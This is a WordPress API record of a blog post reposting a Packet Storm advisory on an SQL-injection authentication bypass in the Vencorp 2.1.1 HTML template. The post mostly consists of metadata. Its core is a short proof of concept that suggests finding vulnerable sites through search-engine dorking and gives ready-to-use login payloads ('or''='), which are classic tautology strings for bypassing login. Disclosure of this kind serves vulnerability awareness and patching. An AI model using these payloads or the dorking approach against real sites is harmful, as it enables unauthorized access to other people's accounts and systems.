{"id":58432,"date":"2024-07-24T18:29:57","date_gmt":"2024-07-24T15:29:57","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/179695\/vencorp211-sqlbypass.txt"},"modified":"2024-07-24T18:29:57","modified_gmt":"2024-07-24T15:29:57","slug":"vencorp-2-1-1-sql-injection","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/vencorp-2-1-1-sql-injection\/","title":{"rendered":"Vencorp 2.1.1 SQL Injection"},"content":{"rendered":"<dl id=\"F179695\" class=\"file first\" readability=\"-1.0426829268293\">\n<dt><a class=\"ico text-plain\" href=\"https:\/\/packetstormsecurity.com\/files\/download\/179695\/vencorp211-sqlbypass.txt\" title=\"Size: 1.1 KB\" target=\"_blank\" rel=\"noopener\"><strong>Vencorp 2.1.1 SQL Injection<\/strong><\/a><\/dt>\n<dd class=\"datetime\">Posted <a href=\"https:\/\/packetstormsecurity.com\/files\/date\/2024-07-24\/\" title=\"13:31:30 UTC\" target=\"_blank\" rel=\"noopener\">Jul 24, 2024<\/a><\/dd>\n<dd class=\"refer\">Authored by <a href=\"https:\/\/packetstormsecurity.com\/files\/author\/7697\/\" class=\"person\" target=\"_blank\" rel=\"noopener\">indoushka<\/a><\/dd>\n<dd class=\"detail\" readability=\"0\">\n<p>Vencorp version 2.1.1 suffers from a remote SQL injection vulnerability that allows for authentication bypass.<\/p>\n<\/dd>\n<dd class=\"tags\"><span>tags<\/span> | <a href=\"https:\/\/packetstormsecurity.com\/files\/tags\/exploit\" target=\"_blank\" rel=\"noopener\">exploit<\/a>, <a href=\"https:\/\/packetstormsecurity.com\/files\/tags\/remote\" target=\"_blank\" rel=\"noopener\">remote<\/a>, <a href=\"https:\/\/packetstormsecurity.com\/files\/tags\/sql_injection\" target=\"_blank\" rel=\"noopener\">sql injection<\/a>, <a href=\"https:\/\/packetstormsecurity.com\/files\/tags\/bypass\" target=\"_blank\" rel=\"noopener\">bypass<\/a><\/dd>\n<dd class=\"md5\"><span>SHA-256<\/span> | <code>1efa85ad70e114a1d0f8dac25bda7b473b55d33338cbdef57caf77c451658123<\/code><\/dd>\n<dd class=\"act-links\"><a href=\"https:\/\/packetstormsecurity.com\/files\/download\/179695\/vencorp211-sqlbypass.txt\" title=\"Size: 1.1 KB\" rel=\"nofollow noopener\" target=\"_blank\">Download<\/a> | <a href=\"https:\/\/packetstormsecurity.com\/files\/favorite\/179695\/\" class=\"fav\" rel=\"nofollow noopener\" target=\"_blank\">Favorite<\/a> | <a href=\"https:\/\/packetstormsecurity.com\/files\/179695\/Vencorp-2.1.1-SQL-Injection.html\" target=\"_blank\" rel=\"noopener\">View<\/a><\/dd>\n<\/dl>\n<div class=\"src\" readability=\"9.7692307692308\">\n<pre readability=\"7.5\"><code readability=\"9\">====================================================================================================================================<br>| # Title : Vencorp v 2.1.1 Auth by Pass Vulnerability |<br>| # Author : indoushka |<br>| # Tested on : windows 10 Fr(Pro) \/ browser : Mozilla firefox 125.0.1 (64 bits) |<br>| # Vendor : https:\/\/themeforest.net\/item\/elegant-responsive-html5-w-animated-metro-slider\/5440458?ref=Venmond |<br>====================================================================================================================================<p>poc :<\/p>[+] Dorking \u0130n Google Or Other Search Enggine.<\/p>[+] use payload : USer = 'or''='@gmail.com pass = 'or''='<\/p>[+] https:\/\/www\/127.0.0.1\/venmondcom\/demo\/vendroid\/<\/p><p>Greetings to :=================================================<br>jericho * Larry W. Cashdollar *LiquidWorm * Hussin-X * D4NB4R |<br>===============================================================<br><\/p><\/code><\/pre>\n<\/div>\n","protected":false},"excerpt":{"rendered":"<p>Vencorp 2.1.1 SQL Injection Posted Jul 24, 2024 Authored by indoushka Vencorp version 2.1.1 suffers from a remote SQL injection vulnerability that allows for authentication bypass. tags | exploit, remote, sql injection, bypass SHA-256 | 1efa85ad70e114a1d0f8dac25bda7b473b55d33338cbdef57caf77c451658123 Download | Favorite | View ====================================================================================================================================| # Title : Vencorp v 2.1.1 Auth by Pass Vulnerability || # Author &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-58432","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/58432","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=58432"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/58432\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=58432"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=58432"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=58432"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}